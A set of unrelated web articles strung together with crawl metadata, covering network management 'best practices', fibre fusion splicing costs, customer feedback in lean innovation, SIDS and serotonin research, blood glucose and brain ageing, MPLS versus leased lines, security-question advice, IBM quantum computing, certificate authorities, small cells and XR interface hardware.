Although there should be truth-in-advertising laws to cover such claims, unfortunately there is no way to enforce this often exaggerated claim. If only 2% of your product is available via a browser, the vendor is likely to claim it is “web-based.” Being fully web-based has both advantages and disadvantages. Be sure to size up how web-based a particular NMS really is. Some offer reports only, others provide limited configuration capabilities and any combination in between. Disadvantages include the loss of some “windows-style” comforts such as right-click options and drag & drop capabilities. A fully web-based NMS will provide 100% of its features and functionality in a browser, with no management client software to install, including java applets. This provides true anywhere web-based access.
Best Practices
Ahh, we saved the best for last. Whose best practices are they talking about anyway? The ones concocted in the vendor's lab? Best practices should mean those agreed upon by industry standards bodies or trusted user groups. Unfortunately for all of us, no such standards really exist for Network and Systems Management products. Best practices can be anything a vendor claims them to be. Lately, some vendors tout best practices from the IT Infrastructure Library (ITIL), a set of standards originally developed by the British government. Suffice to say that one's best practices may be another's poison and that there's no “one size fits all” for monitoring an infrastructure effectively.
What we can all agree on is that there exists a base list of known events and performance metrics you should be monitoring. Buyers of NSM products should not have to figure out these known items on their own. These events are “best practices” and should be built in with appropriate thresholds pre-determined. If you are lucky, the NSM's “best practices” will be based upon OEM recommendations and published sources.
As fibre deployment has become mainstream, splicing has naturally crossed from the outside plant (OSP) world into the enterprise and even the data centre environment. Fusion splicing involves the use of localized heat to melt together, or fuse, the ends of two optical fibres. The preparation process involves removing the protective coating from each fibre, precise cleaving, and inspection of the fibre end-faces. Fusion splicing has been around for several decades, and it's a trusted method for permanently fusing together the ends of two optical fibres to realize a specific length or to repair a broken fibre link. However, because of the high cost of fusion splicers, it was long out of reach for many users. In recent years, improvements in optical technology have been changing that, and the continued demand for increased bandwidth has further spread the application of fusion splicing.
New Price of Fusion Splicers
Fusion splicer cost has been one of the biggest obstacles to broad adoption of fusion splicing. In recent years, significant decreases in splicer prices have accelerated the popularity of fusion splicing. Today's fusion splicers range in cost from $7,000 to $40,000. The highest-priced units are designed for specialty optical fibres, such as polarization-maintaining fibres used in the production of high-end non-electrical sensors. The lower-end fusion splicers, in the $7,000 to $10,000 range, are primarily single-fibre fixed V-groove type devices. The popular core alignment splicers range between $17,000 and $19,000, well below the $30,000 price of 20 years ago. Prices have dropped dramatically due to more efficient manufacturing, and volume is up because fibre is no longer a voodoo science and more people are working in that arena. Recently, more and more fibre is being deployed closer to the customer premises with higher splice-loss budgets, which results in greater participation by customers who are purchasing lower-end splicers to accomplish their jobs.
More Cost-effective Cable Solutions
The first and primary use of splicing in the telecommunications industry is to link fibres together in underground or aerial outside-plant fibre installations. It used to be very common to do fusion splicing at the building entrance to transition from outdoor-rated to indoor-rated cable, because the NEC (National Electrical Code) specifies that outdoor-rated cable can only come 50 feet into a building due to its flame rating. The advent of plenum-rated indoor/outdoor cable has driven that transition splicing to a minimum. But that’s not to say that fusion splicing in the premise isn’t going on.
Longer distances in the outside plant could mean that sticking with standard outdoor-rated cable and fusion splicing at the building entrance could be the more economical choice. If it’s a short run between building A and B, it makes sense to use newer indoor/outdoor cable and come right into the crossconnect. However, because indoor/outdoor cables are generally more expensive, if it’s a longer run with lower fibre counts between buildings, it could ultimately be cheaper to buy outdoor-rated cable and fusion splice to transition to indoor-rated cable, even with the additional cost of splice materials and housing.
As fibre to the home (FTTH) applications continue to grow around the globe, it is another situation that may call for fusion splicing. If you want to achieve longer distance in a FTTH application, you have to either fusion splice or do an interconnect. However, an interconnect can introduce 0.75dB of loss while the fusion splice is typically less than 0.02dB. Therefore, the easiest way to minimize the amount of loss on a FTTH circuit is to bring the individual fibres from each workstation back to the closet and then splice to a higher-fibre-count cable. This approach also enables centralizing electronics for more efficient port utilisation. In FTTH applications, fusion splicing is now being used to install connectors for customer drop cables using new splice-on connector technology and drop cable fusion splicer.
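The loss-budget arithmetic behind that comparison can be sketched as follows. The per-event losses come from the figures above; the per-kilometre fibre attenuation is an assumed nominal value for illustration, and real budgets include margin and other factors.

```python
# Rough link-loss budget: fibre attenuation plus per-event losses.
FIBRE_DB_PER_KM = 0.35   # assumed nominal singlemode attenuation
CONNECTOR_DB = 0.75      # per interconnect, per the figure above
SPLICE_DB = 0.02         # per fusion splice, per the figure above

def link_loss(km, connectors, splices):
    return km * FIBRE_DB_PER_KM + connectors * CONNECTOR_DB + splices * SPLICE_DB

# The same 5 km run, joined with two interconnects vs. two fusion splices:
print(round(link_loss(5, connectors=2, splices=0), 2))   # 3.25 dB
print(round(link_loss(5, connectors=0, splices=2), 2))   # 1.79 dB
```

Swapping two interconnects for two fusion splices recovers nearly 1.5 dB of budget on this hypothetical run, which is why fusion splicing is the easiest way to stretch a FTTH loss budget.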
A Popular Option for Data Centres
A significant increase in the number of applications supported by data centres has resulted in more cables and connections than ever, making available space a foremost concern. As a result, higher-density solutions like MTP/MPO connectors and multi-fibre cables that take up less pathway space than running individual duplex cables become more popular.
Since few manufacturers offer field-installable MTP/MPO connectors, many data centre managers are selecting either multi-fibre trunk cables with MTP/MPOs factory-terminated on each end, or fusion splicing to pre-terminated MTP/MPO or multi-fibre LC pigtails. When selecting trunk cables with connectors on each end, data centre managers often specify lengths a little longer than needed because they can't always predict exact distances between equipment and they don't want to come up short. However, they then have to deal with the excess slack. When there are thousands of connections, that slack can create a lot of congestion and limit proper air flow and cooling. One alternative is to purchase a multi-fibre pigtail and then splice it to a multi-fibre cable.
Inside the data centre and in the enterprise LAN, 12-fibre MPO connectors provide a convenient method to support higher 40G and 100G bandwidth. Instead of fusing one fibre at a time, another type of fusion splicing, called ribbon/mass fusion splicing, is used. Ribbon/mass fusion splicing can fuse up to all 12 fibres in a ribbon at once, which can reduce termination labor by up to 75% with only a modest increase in tooling cost. Many of today's high-fibre-count cables are built from subunits of 12 fibres each that can be quickly ribbonized. Splicing those fibres individually is very time consuming; ribbon/mass fusion splicers splice entire ribbons simultaneously. Ribbon/mass fusion splicer technology has been around for decades and is now available in handheld models.
Fusion splicing provides permanent, low-loss connections that can be performed quickly and easily, which are definite advantages over competing technologies. In addition, current fusion splicers are designed to provide enhanced features and high-quality performance while remaining affordable. FS provides various types of fusion splicers with high quality at a low price.
Why Customer Feedback is Killing your Innovation Efforts
What feedback really means
The return of a portion of the output of a process or system to the input, especially when used to maintain performance or to control a system or process.
Feedback is not what people think it is. Originally, feedback is an electronic signal received in response to an electronic output. The signal received back can help determine if the outbound signal was “right” or received properly. Today, the term can be applied to non-electronic and non-automated processes, too.
Feedback is good for improving or correcting a process. It’s not good for measuring the impact of the process. Feedback on a product feature, for example, may tell you if it works as expected, but not if the feature contributes to some larger desired outcome. If you want to know about the desired outcome, you have to ask explicitly for that.
True “feedback” must be in response to a specific outbound signal and must be provided by somebody or something that fundamentally understands that output and its purpose.
Instead, we do it wrong. We ask for feedback:
- Without defining the objective
- From people who have no businesses providing it
- In ways that don’t work
Feedback vs. opinions
Your method of eliciting feedback matters (and actually determines whether you are in fact getting “feedback”). Ironically, your target is more likely to give feedback in the true sense of the word than in the way you desire or intend. Asking for feedback takes the target out of the correct context for your purposes.
Entrepreneurs love the idea of pitching their idea and then asking for feedback: “What do you think?” The question doesn’t seek to understand whether the product solves the potential user’s problem, but rather asks the customer to help the entrepreneur. The context is the entrepreneur’s problem of desiring a successful product.
The “user” is prone to give advice on the pitch or on the potential success of the idea. The features she may proffer are not ones she will necessarily use or pay for, but rather features she would build as if she were the entrepreneur!
Is that what you intended?
Let’s look at an example.
Say you’re seeking to disrupt air travel hoping to reinvent the traveler’s experience through modular airplane interiors. In pursuit of this idea, you might want to learn:
- The level of dissatisfaction with current design
- Whether the new system will improve the level of satisfaction
- Whether the new system will hurt the current level of satisfaction
You could use surveys to get “feedback” on some aspects of current air travel. You could have users rate their experiences; you could utilize Net Promoter Score to measure customer “passion.” Customers will be able to respond honestly because you’re asking how they feel with respect to their travel experience.
It’s not “feedback” to ask them whether they’d like a modular interior design. Nor is it “feedback” to ask if they’d feel less safe. They don’t know. They can’t know. Similarly, it’s not “feedback” to ask airplane manufacturing people those questions.
You’re asking for customer speculation. Is this valuable? Is this your intention? Again, true feedback demands knowledge or expertise with respect to the question being asked.
- “Feedback” is for responding to a defined process or output
- Qualitative “feedback” is not right for measuring customer impact or achieving aspiration
- Feedback giver should be an “expert” in the domain they’re providing feedback on
Feedback’s role in Lean Innovation
Asking for feedback incorrectly is simply an invitation to criticize.
The target is no longer acting as an agent of the process and is now mentally engaged with the question about the quality of your performance, regardless if the process achieved its purpose or not.
To many startup entrepreneurs and corporate innovators, asking potential customers and users for “feedback” is the sum and scope of their “customer development” practices. It also happens to be a primary critique of lean startup, pointing to the comments of “visionary” entrepreneurs famous for stating that they’d never ask customers about product needs or desires.
Thing is, the “visionaries” are right. But the problem is not in the asking, it’s how one asks and what one learns. Customers are notoriously bad at providing useful product “feedback” because their responses are merely speculated opinions based on current preferences from past experiences. They know what they like and don’t like about existing products, but that’s about it.
For this reason, Lean Innovation techniques seek to run experiments that measure customer behavior that better demonstrate the value of a product or feature instead of merely asking for “feedback” about a solution idea.
Generally, the more “innovative” the idea, the less likely asking your potential customer about it will yield accurate results. This is also why many traditional market research techniques like focus groups and surveys are also less likely to yield useful data or insights for more innovative ideas.
When working on something new, consider if you should ask for feedback at all.
Anyone will give you feedback whether or not they have the expertise to do so. How you present your request determines the likelihood of its relevance.
This article was originally published on Medium and has been republished with the author’s permission. | <urn:uuid:21c0e129-4d23-40d6-8e61-d4f4b704b939> | CC-MAIN-2022-40 | https://beyondexclamation.com/why-customer-feedback-is-killing-your-innovation-efforts/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333541.98/warc/CC-MAIN-20220924213650-20220925003650-00694.warc.gz | en | 0.932969 | 1,218 | 2.515625 | 3 |
Findings from NIH-funded study could provide basis for forensic SIDS test.
Blood samples from infants who died of Sudden Infant Death Syndrome (SIDS) had high levels of serotonin, a chemical that carries signals along and between nerves, according to a study funded in part by the National Institutes of Health.
The finding raises the possibility that a test could be developed to distinguish SIDS cases from other causes of sleep-related, unexpected infant death.
The study, led by Robin L. Haynes, Ph.D., of Boston Children’s Hospital and Harvard Medical School, appears in the Proceedings of the National Academy of Sciences. NIH’s Eunice Kennedy Shriver National Institute of Child Health and Human Development (NICHD) provided funding for the work.
SIDS is the sudden death of an infant under one year of age that remains unexplained after a complete autopsy and death scene investigation.
In the current study, researchers reported that 31 percent of SIDS infants (19 of 61) had elevated blood levels of serotonin.
In previous studies, the researchers reported multiple serotonin-related brain abnormalities in SIDS cases, including a decrease in serotonin in regions involved in breathing, heart rate patterns, blood pressure, temperature regulation, and arousal during sleep.
Taken together, the researchers wrote, the findings suggest that an abnormality in serotonin metabolism could indicate an underlying vulnerability that increases SIDS risk and that testing blood samples for serotonin could distinguish certain SIDS cases from other infant deaths. However, they caution that more research is needed.
NICHD’s Safe to Sleep campaign provides information on ways to reduce the risk of SIDS and other sleep-related causes of infant death.
Rosemary Higgins, M.D., of the NICHD Pregnancy and Perinatology Branch, which oversaw the study, is available for comment.
Funding: Funding provided by NIH/Eunice Kennedy Shriver National Institute of Child Health and Human Development.
Source: Meredith Daly – NIH/NICHD
Original Research: Full open access research for “High Serum Serotonin in Sudden Infant Death Syndrome” by Robin L. Haynes, Andrew L. Frelinger III, Emma K. Giles, Richard D. Goldstein, Hoa Tran, Harry P. Kozakewich, Elisabeth A. Haas, Anja J. Gerrits, Othon J. Mena, Felicia L. Trachtenberg, David S. Paterson, Gerard T. Berry, Khosrow Adeli, Hannah C. Kinney, and Alan D. Michelson in PNAS. Published online July 3 2017 doi:10.1073/pnas.1617374114 | <urn:uuid:4f1f3a8c-f99a-4379-9b76-75c8ecf7a21e> | CC-MAIN-2022-40 | https://debuglies.com/2017/07/04/high-serotonin-levels-blood-of-sids-infants/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334802.16/warc/CC-MAIN-20220926051040-20220926081040-00694.warc.gz | en | 0.897142 | 564 | 2.6875 | 3 |
More and more companies are talking about SD-WAN. But what is SD-WAN and what are its benefits over a conventional WAN? We’re here to explain. Let’s get really basic. SD-WAN (say the letters S and D, and then say WAN like it’s a word) stands for Software Defined Wide Area Network. A Wide Area Network, of course, is referred to as a WAN. In a conventional WAN, business branches connect to a headquarters or a datacentre with conventional routers and leased-line connections.
When you’re overhauling your legacy phone system, a good dashboard for your phone system should be a key component of your decision-making.
Fill out the form and one of our business experts will be in touch. | <urn:uuid:696dd004-9d1c-47c3-bdb0-29d4bf412c8a> | CC-MAIN-2022-40 | https://www.thinktel.ca/blog/2021/01/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335034.61/warc/CC-MAIN-20220927131111-20220927161111-00694.warc.gz | en | 0.917608 | 171 | 2.5625 | 3 |
New research has found blood glucose levels even at the normal range can have a significant impact on brain atrophy in ageing.
Dr Erin Walsh, lead author and post-doctoral research fellow at ANU, said the impacts of blood glucose on the brain is not limited to people with type 2 diabetes.
“People without diabetes can still have high enough blood glucose levels to have a negative health impact,” said Dr Walsh from the Centre for Research on Ageing, Health and Wellbeing (CRAHW) at ANU.
“People with diabetes can have lower blood glucose levels than you might expect due to successful glycaemic management with medication, diet and exercise.
“The research suggests that maintaining healthy blood glucose levels can help promote healthy brain ageing.
If you don’t have diabetes it’s not too early and if you do have diabetes it’s not too late.”
Dr Walsh said people should consider adopting healthy lifestyle habits, such as regular exercise and healthy diets.
“Having a healthy lifestyle contributes to good glycaemic control without needing a diabetes diagnosis to spur them into adopting these good habits,” she said.
“It helps to keep unhealthy highly processed and sugary foods to a minimum. Also, regular physical activity every day can help, even if it is just a going for walk.”
The research is part of the “Too sweet for our own good: An investigation of the effects of higher plasma glucose on cerebral health” project led by Associate Professor Nicolas Cherbuin, which is part of the longitudinal PATH through life study led by Professor Kaarin Anstey at ANU.
“The work would not be possible without being able to longitudinally explore blood glucose in members of the general public,” said Dr Walsh.
Source: Kate Prestt – Australian National University
Image Source: image is credited to Erin Walsh.
Original Research: The study will appear in Diabetes & Metabolism. | <urn:uuid:4233d85a-8cb1-460c-85d8-eb5e87a71e1c> | CC-MAIN-2022-40 | https://debuglies.com/2017/08/31/healthy-glucose-levels-key-to-healthy-aging-brain/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00694.warc.gz | en | 0.937116 | 413 | 3.484375 | 3 |
“MPLS” is an abbreviation for “Multiprotocol Label Switching.” Data packets are assigned labels in an MPLS network. Instead of examining the packet, packet-forwarding decisions are made based purely on labels.
MPLS guides data from one node to the next based on labels for path instead of network addresses, avoiding complex lookups. At every point, a new label is attached to the packet until it reaches the destination.
MPLS guides data from one node to the next based on shortest labels for path instead of network addresses, avoiding complex lookups.
Leased Line –
A leased line is dedicated and high-speed connectivity built across two sites. Leased lines do not share the connectivity with any other customer and we get symmetric speed in both directions.
It is sometimes also known as a ‘Private Circuit’.Leased lines are older technology than MPLS and have been around a bit longer.
Related – Leased Line vs Broadband
Both Leased Lines and MPLS are available over copper and Fiber medium and support high bandwidths up to Gbps. Additionally both support voice and data services, however, there are parameters on which they differ.
MPLS vs Leased Line –
|Segregation of customer traffic||Logical separation of customer traffic.||Physical separation of customer traffic
|Connectivity Type||Multipoint or point-to-Point||Point-to-Point
|Security||High level by logical separation of traffic||Most secured due to physical separation of traffic
|Skill Requirement||Highly skilled resources at Provider/customer end for deployment of MPLS.||Less skilled resources required for setup of Leased links.
|Spoke to Spoke communication||Remote site needs to traverse viz Hub site to reach other remote site||Direct any to any communication from one Spoke to other
|CAPEX and OPEX||Usually lower cost than P2P Leased links||Higher than MPLS Links
|Physical medium||Shared across multiple customers||Dedicated to customer
|Performance||Improved performance especially when Spoke to Spoke communication||Low performance in Spoke to Spoke communication since HUB incurs additional hop which is not the case in MPLS
|Routing decision||Service provider is involved in Layer 3 Routing of the customer traffic||Service provider does not involve in Routing decision of customer traffic.
|QOS||Service provider QOS for prioritization of delay sensitive and mission critical traffic.||Partially or no QoS
|Traffic Engineering||In MPLS it is possible to set the path that the traffic will have to take through the network.||Not possible in case of Leased links.
|Scalability ||MPLS is as an efficient technology that is easily scaled.||Leased lines are the most difficult to scale, both because of the time needed for deployment and the expense.
|Recommended for ||* Large enterprise with a requirement for secure and private network|
* Have multiple sites spread across a large area.
* Fast growing organization with inorganic growth of sites
|* Require guaranteed bandwidth
* Need to transfer large data reliably and fast between sites
Download the difference table here. | <urn:uuid:a4abf30c-4144-45a9-aa1f-dcc4269877d9> | CC-MAIN-2022-40 | https://ipwithease.com/mpls-vs-leased-line/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00694.warc.gz | en | 0.912976 | 731 | 2.78125 | 3 |
We are constantly hearing new and revised advice on thinking up and managing passwords, but sometimes we have to deal with more than just passwords when it comes to online security. Some sites also require answers to a series of security questions that can later be used to verify your account or recover a lost password.
In recent years, experts have reconsidered the use of security questions, which may ask you to remember personal tidbits like your pet’s name or the first street you lived on. On one hand, these can be easy to answer, but they may lend you a false sense of security.
There are certain classic questions that pop up again and again, like “What is your mother’s maiden name?” or “What was your high school mascot?” One of the biggest problems with these sort of questions is the answers can be easy to find. Your mother’s maiden name is likely a matter of public record and by simply knowing the name of your high school, a thief can figure out the mascot.
Hackers that accessed user accounts, like with the infamous Yahoo data breach, have also been able to access user security questions and answers. So how can we better secure our security questions? One possible approach is to simply lie about your answers, but even that has some potential pitfalls.
Google’s take on security questions
A 2015 study conducted by Google researchers concluded that “secret questions generally offer a security level that is far lower than user-chosen passwords.” It also uncovered a problem where people who lie about their answers later forget those made-up answers, which made it more difficult for them to recover forgotten passwords.
Ultimately, the researchers say, “We conclude that it appears next to impossible to find secret questions that are both secure and memorable.” While the Google research isn’t optimistic about these kind of questions, they are still in use for a lot of websites, so we need to adapt.
How to manage your security answers
Now back to the idea of lying about your answers. How can you field these sort of questions in a more secure way without forgetting your fictional answers? One solution is to use a password manager, which lets you use hard-to-crack passwords without having to remember each and every one. Most password managers let you keep secure notes. This is where you can store your made-up answers.
If you’re not using a password manager, then be sure you come up with fake answers you can replicate later. For example, if the question asks for your mother’s maiden name, you might instead use your grandmother’s middle name or the maiden name of a favorite celebrity.
If the site gives you the option to create your own security questions, then take advantage of that and come up with obscure questions that would not be easy to find by searching you out online or looking at your Facebook or Twitter profile. You might go with something like “What is the name of your imaginary friend from childhood?” or “What band poster did you have on your wall in college?”
Security questions may one day become obsolete, but in the meantime, it’s smart to take some steps to keep your answers as secure as possible. This is one time where a little lying is perfectly acceptable. | <urn:uuid:55340d40-57e0-47cd-808a-e8a85c94e5ad> | CC-MAIN-2022-40 | https://gulfsouthtech.com/uncategorized/one-lie-security-experts-use-all-the-time-and-you-should-too/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00694.warc.gz | en | 0.957389 | 683 | 2.703125 | 3 |
Able to calculate problems at an astronomical scale, quantum computing is getting closer to reality.
For years technologists have questioned how much longer we might expect the current rate of advancement in computing continue.
While Moore’s Law has promised that the speed and capability of computers will double every two years, this has meant components have had to be made smaller and smaller. Barriers loom however in the form of manufacturers’ abilities to work at these microscopic scales.
But while making components smaller can be problematic, the properties of physics that operate at the atomic scale also holds the key to unleashing computing power much greater than Moore’s Law has ever promised.
Called quantum computing, this next generation of computers take advantage of a set of properties called quantum mechanics, and their specific ability to allow particles to exist in multiple simultaneous states, called superposition.
According to the vice president and head of exploratory science and university partnerships at IBM Research, Jeff Welser, quantum computing can be thought of as an extension beyond what we can do with a classical computer.
Classical systems represent information as a ‘bit’, where its state is either one or zero (the foundation for binary computing), while in quantum computing a bit can exist in multiple compute states simultaneously, known as qubits.
“What that means is you can test large combinations of ones and zeros across qubits simultaneously, so it allows you to explore potential solutions to very large problems,” Welser says.
One of the key application areas for quantum computing is in chemistry, where Welser says it will have applications in materials science.
“Maybe you’re trying to discover new molecules for pharmaceuticals,” he says. “So let’s take the molecule caffeine, which has 95 electrons on it. If you wanted to do a simulation of that molecule on a standard classical computing system you need to have a supercomputer with 1048 bits.
“To give you a reference point, there are 1050 atoms in the entire Earth. There’s just no way you could ever build a system big enough to even do that computation.”
However, Welser says with a quantum computer that task could be completed using just 160 qubits. IBM has already released a system with 65 qubits and has plans to release a 1000-qubit system by 2023.
However, in addition to needing to build scale, he cautions that today’s quantum computers are still relatively error prone. Hence IBM is working to improve the error rate and to encode error correction into their quantum systems.
“When we reach that point — 1000 qubits — assuming we have enough error correction control, that should be enough to start doing some interesting things in chemistry and material science,” Welser says.
IBM is already fielding interest in quantum computers from companies including Daimler AG, the parent company of Mercedes-Benz, to model the materials used in next generation batteries for electric vehicles. IBM is also working with the bank JP Morgan Chase to solve optimisation problems in the financial services sector.
“The companies that are interested are ones that are bumping up against the limits of what they can do with current classical systems, so they want to actually start experimenting with quantum,” Welser says.
While many of the benefits of quantum computing are reliant on the creation of suitably powerful systems, Welser says IBM is also investing in creating a community of people with the skills needed to make use of them. Since 2016, when IBM put the first quantum computer on the cloud, anyone can access the company’s public quantum systems through the IBM Quantum Experience. And organizations can access their premium systems by joining the IBM Q Network. IBM has also been contributing to the creation of an open source software kit called Qiskit which provides a quantum-oriented software programming tools.
“For quantum computing to take off it requires a very large ecosystem of people utilising it, finding how to apply it, learning how to use it, and building better software for it,” Welser says.
Ultimately, he says the contribution that quantum computing can make in fields such as material science will play a vital role in solving some of the most complex challenges facing humanity.
“If you think about a lot of the problems we face today, with the climate, with sustainability, or even fighting pandemics, a lot of it does involve the finding of new materials and new substances that can help us,” Welser says. “If we have systems that can not only do high performance computing like we have today, but also do very large problems and even quantum simulations, all of these combined could really offer a powerful way of discovering new materials.”
Author: Dr Mohammad Choucair, CEO Archer Materials If I say to you that quantum computing represents the next generation of powerful computing, does that seem realistic? Will it happen? Or is it simply the dream of theoretical physicists? I believe that quantum deserves our urgent attention today, not in some distant future. There are huge, […]
Originally published in The Australian. Able to calculate problems at an astronomical scale, quantum computing is getting closer to reality. For years technologists have questioned how much longer we might expect the current rate of advancement in computing continue. While Moore’s Law has promised that the speed and capability of computers will double every two […]
Author: Jodie Sangster, Chief Marketing Officer, IBM Australia & New Zealand The ambition for most of us right now is to live in a world beyond the grips of COVID-19. While this year has presented all of us with incredible challenges, it has also created unique opportunities for businesses, governments and leaders across our society […]
For over 90 years, IBM has been working to solve some of the biggest issues facing Australia and New Zealand. Today, IBM has laid the foundation for a new era of business with leading hybrid cloud, cybersecurity, quantum and AI solutions.
These are our stories; this is IBM. | <urn:uuid:beaa9b9b-e207-4063-8ae6-bcac43ed443a> | CC-MAIN-2022-40 | https://www.ibm.com/blogs/ibm-anz/a-quantum-leap-for-computing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00094.warc.gz | en | 0.955352 | 1,249 | 3.53125 | 4 |
Public CAs are organizations which issue certificates to other organizations. Public CAs are generally trusted so certificates issued by them are validated and have higher levels of trust associated.The organization first does some necessary checks, including domain validation. Then the Public CA uses their private key to issue the requester a certificate while also attaching a public key that the requester can use.While someone establishes a connection, the certificate is validated with the Public CA by checking if the requester is the valid holder of the certificate. The public key is checked, and then a secure connection can be established using asymmetric encryption.
Private CA are an organization’s own local CA that is created for internal purposes only. The certificates issued are signed by the organization’s Private Root CA using its private key. Private CAs are used to build a private internal PKI network to issue certificates within the organization.They can be used to run devices and appliances within the organization and can be utilized by users for VPNs, Secure Email and can be used by servers for encrypting data in a database. | <urn:uuid:426f04dd-7e68-4b58-8edd-180fb22aeeb7> | CC-MAIN-2022-40 | https://www.encryptionconsulting.com/tag/public-ca/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335058.80/warc/CC-MAIN-20220927194248-20220927224248-00094.warc.gz | en | 0.950603 | 217 | 2.96875 | 3 |
What is Small Cell Technology?
What are Small Cells?
Mobile connectivity requirements are increasing at an unparalleled rate. Now that so many devices rely on wireless networks, particularly in highly populated areas such as towns and cities, network operators are forced to find robust solutions that allow for higher bandwidth than traditional options as well as remaining efficient in terms of power usage.
A recent approach taken by carriers has seen the introduction of small cell architecture in developing and developed markets around the world. Unlike traditional cellular networks, these small cells enable operators to increase the performance of the network connectivity for their consumers. That’s because they traditionally use large cell wireless transmitters to service a wide area, whereas a higher quantity of smaller cells are more effective; even out to the edge of existing networks.
What are the benefits of Small Cells in existing networks?
The greatest benefit of small cell architecture is superior coverage for the increased number of mobile consumers and independent devices requiring connectivity. In a time when we have begun to see IoT enabled products being launched and the demand for coverage increasing tenfold, small cells are providing the infrastructure for much needed connectivity.
Also, significant, costly investments aren’t required by operators for deploying small cells. This is because the small cell architecture utilizes additional base stations that extend the range of traditional cells. Therefore, individual devices can transmit data more effectively with these wider coverage areas and with reduced power consumption.
Small cell connectivity means that devices don’t struggle to maintain a connection over longer distances. This reduces the need for data correction or retransmission of lost packets. This in turn provides extended operating time for the mobile device and extended operating time for those devices that rely on power.
Other opportunities for Small Cell infrastructure
Aside from the obvious significant benefits for consumers connecting to mobile networks within cities and urban areas, there are also a number of other alternative deployments for small cell architecture, which could significantly improve existing networks.
Firstly, small cells could be deployed in large corporate/commercial environments where existing large cells are used to provide wireless connectivity but struggle with physical barriers creating obstructions. Instead an alternative would be to deploy small cells indoors allowing for hotspots to provide reliable coverage in areas that would have otherwise been out of service and suffered with signal degradation.
Small cells would also provide a great solution for other isolated areas and industries such as mining.
Get all of our latest news sent to your inbox each month. | <urn:uuid:5b3e89e0-9353-4644-a8d5-e05145e0fb2e> | CC-MAIN-2022-40 | https://www.carritech.com/news/small-cells/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00094.warc.gz | en | 0.948417 | 495 | 3.296875 | 3 |
As amazing as virtual worlds can be, they require a connection to the real world, the human user. Interface technologies are the crucial interpreters that translate virtual events into experiences humans can sense.
In augmented reality (AR), simple overlays on a cellphone camera's view provide a wealth of opportunities. Niantic's AR game Pokémon Go from 2016 is an example of such uses.
Meanwhile, smart glasses – such as Google’s ill-fated early attempt with Google Glass from 2013 – are dedicated devices to overlay virtual elements in line of sight to avoid the need to handle and point a cellphone to access virtual information.
In virtual reality (VR), headsets dominate the market, and visual interfaces are at the centre of developers' attention. Vision is the most obvious connection to human perception, but a sole focus on it will limit the applications of extended reality (XR) and restrict the degree of immersiveness the new computing environment could conceivably achieve.
The article Understanding the metaverse – a discussion at SXSW mentions the US National Aeronautics and Space Administration (Nasa)’s Virtual Interface Environment Workstation (VIEW), an early example of a VR headset from 1990. A visual interface was a natural component of such a VR system, but engineers at that time had already experimented with additional interfaces to increase the system’s capabilities.
The system featured a headset very similar to today’s VR headsets, but it also included other interface technologies. The DataGlove is a glove with sensors that can detect finger movement, which can be used as an input device. Similarly, the DataSuit is a full-body garment capable of capturing information about the wearer’s body movement and their spatial orientation. At the time, DataGlove and DataSuit were only considered as input devices, not as output devices that would provide users with information or sensations.
XR, particularly VR, promises to create immersive experiences. But limiting experiences to visuals and (often non-directional) audio will not realise the new technologies' full potential. In fact, in some cases, addressing a range of sensations simultaneously will be not merely desirable but necessary. In some therapeutic applications, improvements will rely on providing authentic replications of real-world conditions.
An example from 2017 offers a glimpse into the extent to which XR can envelop users. The University of Southern California’s Institute for Creative Technologies developed Bravemind – a VR-based interactive exposure-therapy tool for use in assessing and treating post-traumatic stress disorder (PTSD). Bravemind pairs video game-style computer-generated imagery with “realistic sensory stimuli – sounds, vibrations, even smells provided by a machine loaded with vials of scents – to approximate the circumstances of a war veteran’s traumatic memories”.
The software’s 14 environments, ranging from remote Afghan villages to crowded Baghdad markets, include attackers, bombs, and innocent bystanders.
The current interface focus is on visual technologies – after all, in many applications, visual information by itself can be sufficient. AR sights that provide navigational information or VR landscapes that present architectural plans offer a substantial improvement over currently common approaches. No wonder so many companies work on headsets and glasses. The lists are long, even if looking at only a selection of devices.
VR headsets include HTC’s Vive, Meta Platforms’ Oculus Quest and its high-end, forthcoming Project Cambria, Sony’s VR2, Varjo’s high-end range of headsets, and Xiaomi’s Mi devices. And then there is a host of AR smart glasses. Again, a long list exists and includes Google Glass, Magic Leap, Nreal, Ray-Ban and Snap’s Spectacles. Two other major players need to be mentioned. Microsoft markets its HoloLens 2 headset as a mixed-reality device, while Apple’s efforts in AR and VR are shrouded in mystery and subject to the rumour mill, ranging from its working on AR devices to efforts to create a range of XR devices from high end to low end.
Headsets and smart glasses are the user interfaces that come to mind most readily when talking about XR environments and the metaverse. The lists above include well-known device manufacturers, prominent social media companies and a number of startups, with Magic Leap having had its share of notoriety and hype. But perhaps this most obvious vector of attacking the market of XR interfaces could very well be the most challenging as well.
This market arena might be subject to the majority fallacy. Different interpretations exist, but essentially, the thinking is that the major markets will attract a large number of players, ranging from large incumbents to well-funded startups – after all, a large market size translates into substantial revenue. But such an obvious market will also result in cut-throat competition and potentially razor-thin margins.
Consolidation and attrition
Over time, the market for these types of headsets will divide into a number of segments that address specific needs, but consolidation and attrition of companies will happen during that period. In fact, the lower end of the market is already experiencing revenue threats. In March 2022, OpenAR, the Open Source Community for Augmented Reality, released a roadmap for DIY open AR glasses that outlines the community’s schedule, through June 2026, for introducing increasingly capable versions of a low-end interface.
The version that was released in January 2022 can reportedly be put together for less than €20. The device is unwieldy and unlikely to catch the attention of any sizeable market, but it represents a start, and the price point illustrates the community’s ambition. A range of alternative user interfaces will conceivably be able to carve out market niches that might not feature the same revenue potential as headsets and smart glasses – although some might – but promise very high profit margins for companies willing to focus on specialised or high-end applications.
